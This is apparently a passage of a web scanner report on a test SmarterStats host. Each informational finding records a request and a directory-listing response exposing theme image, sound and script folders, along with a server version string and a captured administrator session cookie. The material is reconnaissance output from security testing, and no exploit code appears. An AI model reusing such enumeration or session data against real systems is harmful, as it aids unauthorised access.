   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Images/Pager/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L.gif">doubleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L_disabled.gif">doubleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R.gif">doubleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R_disabled.gif">doubleArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 51 <A href="downState.gif">downState.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L.gif">endArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L_disabled.gif">endArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R.gif">endArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R_disabled.gif">endArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 66 <A href="hoverState.gif">hoverState.gif</A>
Thursday, October 07, 2010 01:00 PM 163 <A href="singleArrow_L.gif">singleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_L_disabled.gif">singleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R.gif">singleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R_disabled.gif">singleArrow_R_disabled.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.44. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Javascript/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Javascript/

Request

GET /App_Themes/Default/Javascript/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:35 GMT
Content-Length: 1375
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Javascript/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Javascript/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 54 <A href="Skin.js">Skin.js</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.45. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Sounds/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/Sounds/

Request

GET /App_Themes/Default/Sounds/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:13:44 GMT
Content-Length: 1985
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Sounds/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/Sounds/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 15,074 <A href="Chat_ClientMessage.mp3">Chat_ClientMessage.mp3</A>
Thursday, October 07, 2010 01:00 PM 26,042 <A href="Chat_NewChat.mp3">Chat_NewChat.mp3</A>
Thursday, October 07, 2010 01:00 PM 27,031 <A href="Chat_Red.mp3">Chat_Red.mp3</A>
Thursday, October 07, 2010 01:00 PM 22,652 <A href="Chat_White.mp3">Chat_White.mp3</A>
Thursday, October 07, 2010 01:00 PM 22,652 <A href="Chat_Yellow.mp3">Chat_Yellow.mp3</A>
Thursday, October 07, 2010 01:00 PM 12,197 <A href="NewReminder.mp3">NewReminder.mp3</A>
Thursday, October 07, 2010 01:00 PM 15,408 <A href="NewReminder.wav">NewReminder.wav</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.46. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/

Request

GET /App_Themes/Default/images/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/Images/16x16/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:51 GMT
Content-Length: 2178
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>

Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="16x16/">16x16</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Customer/">Customer</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Icons/">Icons</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Invitations/">Invitations</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Misc/">Misc</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Pager/">Pager</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Plupload/">Plupload</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Skin/">Skin</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="social_icons/">social_icons</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Stats/">Stats</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.47. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Customer/

Request

GET /App_Themes/Default/images/Customer/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:54 GMT
Content-Length: 3294
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Customer/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Customer/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,524 <A href="Chat_sendTranscript.png">Chat_sendTranscript.png</A>
Thursday, October 07, 2010 01:00 PM 1,990 <A href="Chat_takeSurvey.png">Chat_takeSurvey.png</A>
Thursday, October 07, 2010 01:00 PM 2,311 <A href="Chat_viewTranscript.png">Chat_viewTranscript.png</A>
Thursday, October 07, 2010 01:00 PM 180 <A href="CustomerBars.png">CustomerBars.png</A>
Thursday, October 07, 2010 01:00 PM 202 <A href="CustomerButtons.png">CustomerButtons.png</A>
Thursday, October 07, 2010 01:00 PM 160 <A href="CustomerTabs.png">CustomerTabs.png</A>
Thursday, October 07, 2010 01:00 PM 2,401 <A href="FE_Agent.png">FE_Agent.png</A>
Thursday, October 07, 2010 01:00 PM 1,423 <A href="FE_Forums.png">FE_Forums.png</A>
Thursday, October 07, 2010 01:00 PM 2,314 <A href="FE_KB.png">FE_KB.png</A>
Thursday, October 07, 2010 01:00 PM 2,312 <A href="FE_MyAccount.png">FE_MyAccount.png</A>
Thursday, October 07, 2010 01:00 PM 2,190 <A href="FE_News.png">FE_News.png</A>
Thursday, October 07, 2010 01:00 PM 2,209 <A href="FE_Register.png">FE_Register.png</A>
Thursday, October 07, 2010 01:00 PM 2,252 <A href="FE_Submit.png">FE_Submit.png</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="FE_topbar_tile.png">FE_topbar_tile.png</A>
Thursday, October 07, 2010 01:00 PM 2,197 <A href="FE_View.png">FE_View.png</A>
Thursday, October 07, 2010 01:00 PM 4,439 <A href="LiveChatOffline.PNG">LiveChatOffline.PNG</A>
Thursday, October 07, 2010 01:00 PM 3,537 <A href="LiveChatOnline.PNG">LiveChatOnline.PNG</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Pager/">Pager</A>
Thursday, October 07, 2010 01:00 PM 1,009 <A href="RssFeedLogo.gif">RssFeedLogo.gif</A>
Thursday, October 07, 2010 01:00 PM 1,072 <A href="Send.gif">Send.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.48. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/Pager/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Customer/Pager/

Request

GET /App_Themes/Default/images/Customer/Pager/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:55 GMT
Content-Length: 2842
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Customer/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Customer/Pager/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/Customer/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L.gif">doubleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L_disabled.gif">doubleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R.gif">doubleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R_disabled.gif">doubleArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 51 <A href="downState.gif">downState.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L.gif">endArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L_disabled.gif">endArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R.gif">endArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R_disabled.gif">endArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 66 <A href="hoverState.gif">hoverState.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_L.gif">singleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_L_disabled.gif">singleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R.gif">singleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R_disabled.gif">singleArrow_R_disabled.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.49. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Invitations/

Request

GET /App_Themes/Default/images/Invitations/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:56 GMT
Content-Length: 3305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Invitations/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Invitations/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 4,671 <A href="AgentIcon.gif">AgentIcon.gif</A>
Thursday, October 07, 2010 01:00 PM 554 <A href="BtmLeftShadow_1.gif">BtmLeftShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 697 <A href="BtmLeftShadow_2.gif">BtmLeftShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 363 <A href="BtmLeftShadow_Corner.gif">BtmLeftShadow_Corner.gif</A>
Thursday, October 07, 2010 01:00 PM 155 <A href="BtmLeftShadow_Tile.gif">BtmLeftShadow_Tile.gif</A>
Thursday, October 07, 2010 01:00 PM 533 <A href="BtmRightShadow_1.gif">BtmRightShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 437 <A href="BtmRightShadow_2.gif">BtmRightShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 420 <A href="BtmRightShadow_Corner.gif">BtmRightShadow_Corner.gif</A>
Thursday, October 07, 2010 01:00 PM 154 <A href="BtmRightShadow_Tile.gif">BtmRightShadow_Tile.gif</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Button/">Button</A>
Thursday, October 07, 2010 01:00 PM 354 <A href="LeftShadow_1.gif">LeftShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 244 <A href="LeftShadow_2.gif">LeftShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 292 <A href="LeftShadow_3.gif">LeftShadow_3.gif</A>
Thursday, October 07, 2010 01:00 PM 368 <A href="RightShadow_1.gif">RightShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 252 <A href="RightShadow_2.gif">RightShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 343 <A href="RightShadow_3.gif">RightShadow_3.gif</A>
Thursday, October 07, 2010 01:00 PM 253 <A href="RightShadow_4.gif">RightShadow_4.gif</A>
Thursday, October 07, 2010 01:00 PM 1,273 <A href="WMAlert.gif">WMAlert.gif</A>
Thursday, October 07, 2010 01:00 PM 1,439 <A href="WMConfirmation.gif">WMConfirmation.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.50. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/Button/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Invitations/Button/

Request

GET /App_Themes/Default/images/Invitations/Button/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:57 GMT
Content-Length: 2415
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Invitations/Button/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Invitations/Button/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/Invitations/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 162 <A href="Arrow.gif">Arrow.gif</A>
Thursday, October 07, 2010 01:00 PM 212 <A href="Button_LeftCap.gif">Button_LeftCap.gif</A>
Thursday, October 07, 2010 01:00 PM 848 <A href="Button_RightCap.gif">Button_RightCap.gif</A>
Thursday, October 07, 2010 01:00 PM 157 <A href="Button_Tile.gif">Button_Tile.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="StartBtn_LeftCap.gif">StartBtn_LeftCap.gif</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="StartBtn_LeftCap_Over.gif">StartBtn_LeftCap_Over.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="StartBtn_RightCap.gif">StartBtn_RightCap.gif</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="StartBtn_RightCap_Over.gif">StartBtn_RightCap_Over.gif</A>
Thursday, October 07, 2010 01:00 PM 95 <A href="StartBtn_Tile.gif">StartBtn_Tile.gif</A>
Thursday, October 07, 2010 01:00 PM 94 <A href="StartBtn_Tile_Over.gif">StartBtn_Tile_Over.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.51. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Plupload/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Plupload/

Request

GET /App_Themes/Default/images/Plupload/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:58 GMT
Content-Length: 2055
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Plupload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Plupload/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,977 <A href="backgrounds.gif">backgrounds.gif</A>
Thursday, October 07, 2010 01:00 PM 1,252 <A href="buttons-disabled.png">buttons-disabled.png</A>
Thursday, October 07, 2010 01:00 PM 1,400 <A href="buttons.png">buttons.png</A>
Thursday, October 07, 2010 01:00 PM 180 <A href="delete.gif">delete.gif</A>
Thursday, October 07, 2010 01:00 PM 1,024 <A href="done.gif">done.gif</A>
Thursday, October 07, 2010 01:00 PM 994 <A href="error.gif">error.gif</A>
Thursday, October 07, 2010 01:00 PM 1,922 <A href="throbber.gif">throbber.gif</A>
Thursday, October 07, 2010 01:00 PM 325 <A href="transp50.png">transp50.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.52. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/

Request

GET /App_Themes/Default/images/icons/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:46 GMT
Content-Length: 1996
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 896 <A href="Button_Tile.png">Button_Tile.png</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="DragDrop/">DragDrop</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenu/">IconMenu</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenuInternal/">IconMenuInternal</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenuStats/">IconMenuStats</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenuTrack/">IconMenuTrack</A>
